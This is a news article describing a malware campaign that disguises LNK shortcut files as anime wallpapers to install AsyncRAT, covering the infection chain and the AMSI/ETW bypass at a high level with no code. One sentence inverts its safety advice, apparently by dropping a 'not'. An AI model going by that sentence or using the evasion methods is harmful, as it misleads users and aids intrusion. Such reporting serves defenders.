Skip to content

Malicious campaign uses anime wallpaper to spread AsyncRAT

  • by
  • 3 min read

A newly identified campaign, likely orchestrated by a Portuguese-speaking threat actor, is leveraging malicious shortcut (LNK) files disguised as wallpapers featuring popular anime characters. The campaign aims to deliver AsyncRAT by bypassing security measures and employing advanced obfuscation techniques.

Researchers discovered that the initial infection vector remains unidentified, but once a user executes the malicious LNK file, it triggers a sequence of actions. The file runs an obfuscated PowerShell script, retrieving a secondary payload from an external source and executing it in memory.

This payload then downloads additional files, including a batch script that ensures persistence and further malicious execution.

This is an image of sasukewallpaper asyncrat malware ss1
Samples of Sasuke wallpaper used by threat actors to deliver AsyncRAT. | Source: Cyble

On analysing the campaign, researchers found that the filename ‘sasukewallpaper.ink’ was used to lure victims. Sasuke is a popular character in the Naruto anime series and has been a favourite of people for quite a while now. While the wallpaper is displayed at the forefront, a script is downloaded in the background. This script deploys additional payloads in the system.

Security researchers found that the attack relies on sophisticated evasion techniques including bypassing security mechanisms such as Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW). The malware utilises the publicly available ‘Null-ASMI- tool to disable security defences in memory, preventing detection.

This is an image of sasukewallpaper asyncrat malware ss2
The attack flow explained. | Source: Cyble

“A critical aspect of this campaign is its ability to bypass security mechanisms such as the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW). The campaign leverages the “Null-AMSI” tool, which is publicly available on GitHub,” researchers explained.

The payloads are protected using AES encryption and GZIP compression, rendering them invisible to static analysis tools until decrypted dynamically. Furthermore, by executing scripts directly in memory rather than writing to disk, the campaign avoids leaving traces that could trigger security alerts.

The final stage of the attack installs AsyncRAT, which provides the attacker with full control over the compromised system. This RAT allows the threat actors to steal sensitive data, install additional malware, and execute remote commands.

Experts have cautioned users to download files, especially LNK shortcuts, from random websites on the Internet, deploy antivirus, restrict PowerShell execution policies, and keep the security software updated.

In the News: Hackers sell 6.5 million Investing.com user records online

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me

Related Reads

This is an image of data breach featured

Legends International suffers data breach affecting employees and venue visitors

This is an image of cyber security hacked breach

Freshly discovered Windows vulnerability already exploited in the wild

This is an image of court featured ss1

Indian consumer courts to accept complaints against WhatsApp

  • by
  • In News
This is an image of discord203947

Discord verifies age with ID and face scans for select users

This is an image of drone 1866742 1280

British soldiers are using radio waves to take down drones

This is an image of cyber security hacked hacking 3889

State-sponsored hackers are increasingly using ClickFix tactics for the first time

>